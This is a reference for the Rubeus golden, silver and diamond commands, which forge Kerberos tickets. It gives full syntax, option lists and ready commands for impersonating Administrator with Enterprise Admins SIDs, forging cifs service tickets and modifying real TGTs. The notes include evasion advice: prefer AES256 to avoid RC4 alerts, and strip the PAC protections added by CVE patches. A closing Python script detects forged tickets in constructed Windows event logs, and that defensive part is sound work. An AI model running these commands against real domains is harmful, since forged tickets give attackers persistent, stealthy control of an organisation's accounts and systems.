golden / silver / diamond

Forge Kerberos tickets. golden forges TGTs, silver forges service tickets (TGS), diamond modifies a real TGT to change PAC fields.

golden — Forge TGT

# Auto-populate from LDAP
Rubeus.exe golden </des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> </user:<username>> /ldap [/dc:<dc-ip>] [/domain:<domain>] [/sid:<sid>] [/groups:<group-ids>] [/sids:<extra-sids>] [/id:<user-id>] [/ptt] [/outfile:<output>] [/printcmd] [/nowrap]

# Fully explicit
Rubeus.exe golden </des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> </user:<username>> </domain:<domain>> </sid:<sid>> [/dc:<dc-ip>] [/netbios:<netbios>] [/groups:<group-ids>] [/pgid:<pgid>] [/id:<user-id>] [/sids:<extra-sids>] [/starttime:<ts>] [/endtime:<relative>] [/renewtill:<relative>] [/oldpac] [/extendedupndns] [/ptt] [/outfile:<output>] [/printcmd]

golden Options

  • /rc4:<rc4> — krbtgt NT hash
  • /aes256:<aes256-key> — krbtgt AES256 key (preferred, less detectable)
  • /aes128:<aes128-key> — krbtgt AES128 key
  • /user:<username> — username to impersonate
  • /domain:<domain> — FQDN of domain
  • /sid:<sid> — domain SID (e.g. S-1-5-21-...)
  • /ldap — auto-query LDAP for PAC fields (user info, groups, policy)
  • /dc:<dc-ip> — DC for LDAP queries
  • /id:<user-id> — user RID (default: 500)
  • /pgid:<pgid> — primary group ID (default: 513)
  • /groups:<group-ids> — comma-separated group RIDs (default: 520,512,513,519,518)
  • /sids:<extra-sids> — ExtraSIDs, e.g. Enterprise Admins SID for cross-domain
  • /netbios:<netbios> — NetBIOS domain name
  • /displayname:<name> — full display name in PAC
  • /starttime:<ts> — ticket start time (local time)
  • /endtime:<relative> — relative end time, e.g. 10h, 7d
  • /renewtill:<relative> — renewal limit, e.g. 7d
  • /oldpac — exclude new PAC buffers added post-CVE-2021-42287
  • /extendedupndns — include extended UpnDns fields
  • /rodcNumber:<n> — forge RODC partial TGT for Key List Requests
  • /ptt — inject into current session
  • /outfile:<output> — save to file
  • /printcmd — print command to re-forge the same ticket

silver — Forge Service Ticket (TGS)

# Auto-populate from LDAP
Rubeus.exe silver </des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> </user:<username>> </service:<spn>> /ldap [/krbkey:<hash>] [/krbenctype:DES|RC4|AES128|AES256] [/creduser:<domain>\<username>] [/credpassword:<password>] [/dc:<dc-ip>] [/domain:<domain>] [/sid:<sid>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt] [/outfile:<output>] [/nofullpacsig] [/printcmd]

# Explicit
Rubeus.exe silver </rc4:<rc4> | /aes256:<aes256-key>> </user:<username>> </service:<spn>> </domain:<domain>> </sid:<sid>> [/krbkey:<hash>] [/dc:<dc-ip>] [/netbios:<netbios>] [/groups:<group-ids>] [/sids:<extra-sids>] [/authdata] [/cname:<name>] [/crealm:<domain>] [/s4uproxytarget:<spn>] [/s4utransitedservices:<spn1>,<spn2>] [/nofullpacsig] [/ptt] [/outfile:<output>]

silver Options

  • /service:<spn> — target SPN (e.g. cifs/<computer>.<domain>)
  • /krbkey:<hash> — krbtgt key for signing KDCChecksum and TicketChecksum
  • /krbenctype:<type> — encryption type for krbkey
  • /nofullpacsig — exclude FullPacChecksum (pre-CVE-2022-37967 behavior)
  • /authdata — add KERB-LOCAL and KERB-AD-RESTRICTION-ENTRY authorization data
  • /cname:<name> / /crealm:<domain> — override client name/realm in EncTicketPart
  • /s4uproxytarget:<spn> — add S4UDelegationInfo PAC section
  • /s4utransitedservices:<spn1,...> — list of delegation SPNs
  • /creduser:<domain>\<username> — alternate LDAP credentials
  • /credpassword:<password> — password for alternate LDAP credentials

diamond — Forge Diamond TGT

Request a real TGT, then modify its PAC fields by decrypting and re-encrypting it with the krbtgt key.

# From password
Rubeus.exe diamond /krbkey:<hash> /user:<username> /password:<password> [/enctype:aes] [/domain:<domain>] [/dc:<dc-ip>] [/ticketuser:<username>] [/ticketuserid:<user-id>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt] [/outfile:<output>] [/luid]

# From tgtdeleg trick (no creds needed)
Rubeus.exe diamond /krbkey:<hash> /tgtdeleg [/ticketuser:<username>] [/ticketuserid:<user-id>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt]

# From PKINIT certificate
Rubeus.exe diamond /krbkey:<hash> /user:<username> /certificate:<path.pfx> [/password:<password>] [/domain:<domain>] [/dc:<dc-ip>] [/ticketuser:<username>] [/ticketuserid:<user-id>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt]

diamond Options

  • /krbkey:<hash> — krbtgt AES256/RC4 key to decrypt and resign the TGT
  • /ticketuser:<username> — username to embed in the modified ticket
  • /ticketuserid:<user-id> — RID of the embedded user
  • /groups:<group-ids> — comma-separated group RIDs
  • /sids:<extra-sids> — ExtraSIDs (e.g. Enterprise Admins)
  • /tgtdeleg — use tgtdeleg trick to get base TGT

Common PAC Field Arguments (golden/silver/diamond)

Argument                PAC Field
/id:<user-id>           UserId
/pgid:<pgid>            PrimaryGroupId
/groups:<group-ids>     Groups
/sids:<extra-sids>      ExtraSIDs
/sid:<sid>              LogonDomainId
/netbios:<netbios>      LogonDomainName
/displayname:<name>     FullName
/logoncount:<n>         LogonCount
/badpwdcount:<n>        BadPasswordCount
/uac:<flags>            UserAccountControl
/homedir:<dir>          HomeDirectory
/profilepath:<path>     ProfilePath
/scriptpath:<path>      LogonScript
/passlastset:<ts>       PasswordLastSet
/minpassage:<days>      PasswordCanChange
/maxpassage:<days>      PasswordMustChange

Relative time format: an integer followed by m (minutes), h (hours), d (days), M (months) or y (years)

Examples

# Golden ticket via LDAP (minimal args)
Rubeus.exe golden /aes256:<aes256-key> /ldap /user:<username> /printcmd /ptt

# Golden ticket explicit (cross-domain with Enterprise Admins SID)
Rubeus.exe golden /aes256:<aes256-key> /user:Administrator /domain:<domain> /sid:<sid> /sids:<sid>-519 /id:500 /groups:512,513,519 /ptt

# Silver ticket (cifs access)
Rubeus.exe silver /rc4:<rc4> /user:<username> /service:cifs/<computer>.<domain> /ldap /krbkey:<aes256-key> /krbenctype:aes256 /domain:<domain> /ptt

# Diamond ticket from tgtdeleg (no plaintext creds)
Rubeus.exe diamond /krbkey:<aes256-key> /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512

# Cross-domain referral TGT (inter-realm)
Rubeus.exe silver /user:<username> /ldap /service:krbtgt/<child-domain> /rc4:<rc4> /sids:<parent-sid>-519 /nowrap

Notes

  • Golden tickets are encrypted and signed with the krbtgt key — use AES256 over RC4 for stealth (RC4 triggers encryption downgrade alerts)
  • Golden tickets survive user password changes (they are only invalidated once the krbtgt password has been reset twice)
  • Diamond tickets are based on real TGTs, so PAC signatures are valid — harder to detect than pure golden tickets
  • /oldpac removes the Requestor/Attributes buffers added to fix CVE-2021-42287 (needed for older environments)
  • /nofullpacsig removes the FullPacChecksum added to fix CVE-2022-37967 (needed for older patch levels)
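The notes above point at two things a defender can look for: RC4 encryption downgrade, and the fact that a forged TGT is built offline and never issued by a KDC, so a domain controller sees service-ticket requests (event 4769) for which it never logged a TGT request (event 4768). The following Python is an added example, not part of Rubeus or of this reference; it runs both checks over a handful of constructed Windows Security event records. The field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress) follow the Windows event schema, 0x17 is RC4-HMAC and 0x12 is AES256; the hostnames, accounts, addresses and timestamps are invented.

```python
from datetime import datetime, timedelta

# Constructed sample events modelled on the Windows Security log:
# 4768 = Kerberos TGT requested (AS-REQ), 4769 = service ticket requested (TGS-REQ).
# All values are invented for this example; they are not real log data.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TimeCreated": "2024-01-10T08:00:00", "TargetUserName": "alice",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TimeCreated": "2024-01-10T08:00:05", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "cifs/FS01.corp.local", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    # RC4 service ticket for a privileged account with no TGT request from that host: both indicators fire
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:15:00", "TargetUserName": "Administrator@CORP.LOCAL",
     "ServiceName": "cifs/FS01.corp.local", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77"},
    # AES service ticket with no TGT request on this DC: still worth correlating across all DCs
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:20:00", "TargetUserName": "svc_backup@CORP.LOCAL",
     "ServiceName": "ldap/DC01.corp.local", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.78"},
]

RC4_HMAC = "0x17"
# Assumed correlation window: the default Kerberos MaxTicketAge of 10 hours. A 4769 should be
# preceded by a 4768 for the same account and client within one TGT lifetime.
TGT_WINDOW = timedelta(hours=10)


def _account(name):
    """Normalise 'user' (4768) and 'user@REALM' (4769) to a comparable key."""
    return name.split("@", 1)[0].lower()


def find_forged_ticket_indicators(events, window=TGT_WINDOW):
    """Return (rule, account, client_ip, service) tuples for suspicious 4769 events.

    rc4_downgrade    - service ticket requested with RC4-HMAC; tune this to accounts and
                       domains where AES is supported, otherwise legacy hosts will be noisy.
    tgs_without_tgt  - no 4768 for the same account and client IP within `window`; a
                       KDC-issued TGT always leaves a 4768 on the DC that issued it, so
                       aggregate events from every DC before trusting this rule.
    """
    tgt_requests = {}  # (account, ip) -> [TGT request times]
    for e in events:
        if e["EventID"] == 4768:
            key = (_account(e["TargetUserName"]), e["IpAddress"])
            tgt_requests.setdefault(key, []).append(datetime.fromisoformat(e["TimeCreated"]))

    findings = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        acct = _account(e["TargetUserName"])
        ts = datetime.fromisoformat(e["TimeCreated"])
        if e["TicketEncryptionType"] == RC4_HMAC:
            findings.append(("rc4_downgrade", acct, e["IpAddress"], e["ServiceName"]))
        prior = tgt_requests.get((acct, e["IpAddress"]), [])
        if not any(timedelta(0) <= ts - t <= window for t in prior):
            findings.append(("tgs_without_tgt", acct, e["IpAddress"], e["ServiceName"]))
    return findings


if __name__ == "__main__":
    for finding in find_forged_ticket_indicators(SAMPLE_EVENTS):
        print("%-16s account=%s client=%s service=%s" % finding)
```

Two limits follow from the cheat sheet itself. A silver ticket is presented straight to the service and never reaches a KDC, so it produces no 4769 at all; the only trace is a Kerberos logon on the service host with no matching ticket request on any DC. A diamond ticket does start from a real TGT, so the 4768 exists and the `tgs_without_tgt` rule is silent; for those, the PAC contents (group RIDs and ExtraSIDs that the account does not actually hold) are what remains to compare against the directory.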